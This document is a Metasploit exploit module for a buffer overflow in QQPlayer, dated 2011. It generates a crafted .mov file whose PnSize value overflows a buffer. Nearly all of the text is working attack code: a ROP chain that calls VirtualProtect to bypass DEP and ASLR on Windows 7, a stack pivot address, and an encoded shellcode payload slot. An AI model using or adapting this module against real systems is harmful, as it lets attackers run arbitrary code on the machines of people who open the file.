QQPLAYER PICT PnSize Buffer Overflow

`# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS  
# Date: 2011,11,21  
# Author: hellok  
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe  
# Version: 32_845(lastest)  
# Tested on: WIN7  
require 'msf/core'  
class Metasploit3 < Msf::Exploit::Remote  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',  
'Description' => %q{  
This module exploits a vulnerability in QQPLAYER Player 3.2.  
When opening a .mov file containing a specially crafted PnSize value, an attacker  
may be able to execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'hellok', #special thank corelanc0d3r for 'mona'  
],  
'References' =>  
[  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
'DisablePayloadHandler' => 'true',  
},  
'Payload' =>  
{  
'Space' => 750,  
'BadChars' => "", #Memcpy  
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,  
'DisableNops' => 'True',  
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",  
'EncoderOptions' =>  
{  
'BufferRegister' => 'ECX',  
},  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows 7', { 'Ret' => 0x67664cde } ],  
],  
'Privileged' => false,  
'DisclosureDate' => '11 21 2011',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ false, 'The file name.', 'msf.mov' ]),  
], self.class)  
end  
def exploit  
# !mona rop  
rop_gadgets =  
[  
  
0x00418007, # POP ECX # RETN (QQPlayer.exe)  
0x12345678,  
0x67664CE4,   
0x01020304,  
0x10203040,  
0x22331122,  
0x23456789,  
  
0x00418007, # POP ECX # RETN (QQPlayer.exe)  
0x00a9c18c, # <- *&VirtualProtect()  
0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)  
#0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)  
0x008cf099, # XCHG EAX,ESI # RETN  
  
0x6497aaad, # POP EBP # RETN (avformat-52.dll)  
0x100272bf, # ptr to 'call esp' (from i18nu.dll)  
0x005fc00b, # POP EBX # RETN (QQPlayer.exe)  
0x00000331, # <- change size to mark as executable if needed (-> ebx)  
0x00418007, # POP ECX # RETN (QQPlayer.exe)  
0x63d18000, # RW pointer (lpOldProtect) (-> ecx)  
0x63d05001, # POP EDI # RETN (avutil-49.dll)  
0x63d05002, # ROP NOP (-> edi)  
0x008bf00b, # POP EDX # RETN (QQPlayer.exe)  
0x00000040, # newProtect (0x40) (-> edx)  
0x00468800, # POP EAX # RETN (QQPlayer.exe)  
0x90909090, # NOPS (-> eax)  
0x008bad5c, # PUSHAD # RETN (QQPlayer.exe)  
# rop chain generated by mona.py  
# note : this chain may not work out of the box  
# you may have to change order or fix some gadgets,  
# but it should give you a head start  
].pack("V*")  
  
stackpivot = [target.ret].pack('L')  
  
buffer =rand_text_alpha_upper(90)#2  
buffer << rop_gadgets  
buffer << payload.encoded  
  
junk = rand_text_alpha_upper(2306 - buffer.length)  
  
buffer << junk  
buffer << stackpivot  
buffer << rand_text_alpha_upper(3000)#3000  
  
path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov" )  
fd = File.open(path, "rb" )  
sploit = fd.read(fd.stat.size)  
fd.close  
  
sploit << buffer  
  
file_create(sploit)  
end  
end  
  
`